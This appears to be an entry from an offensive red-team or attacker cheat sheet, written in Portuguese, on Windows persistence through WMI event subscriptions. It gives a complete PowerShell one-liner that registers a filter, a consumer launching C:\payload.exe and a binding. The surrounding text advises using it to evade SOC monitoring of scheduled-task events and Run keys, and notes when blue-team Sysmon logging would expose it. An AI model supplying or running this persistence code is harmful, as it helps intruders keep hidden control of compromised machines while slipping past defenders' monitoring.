WMI Event Subscription

$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='Updater'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime > 120"}; $consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='Updater'; CommandLineTemplate='C:\payload.exe'}; Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$filter; Consumer=$consumer}

Regista um filtro e um consumidor WMI que executam o payload quando uma condição do sistema é atendida, sem criar nenhum processo durante a instalação.

Execute quando precisar de persistência que não gere evento de criação de processo nem de tarefa: o WMI é registrado como dados em root\subscription e o payload roda quando o filtro dispara (por exemplo, 2 minutos após a inicialização do sistema). É a persistência favorita em hosts onde o SOC monitora 4698 e Run keys.

Se a equipe azul tiver Sysmon 19/20/21 (eventos WMI), o registro é visto na hora. Os consumidores CommandLineEventConsumer deixam o comando em texto claro no WMI: qualquer query de detecção o encontra. Não use se o host tiver hardening que bloqueia a escrita em root\subscription.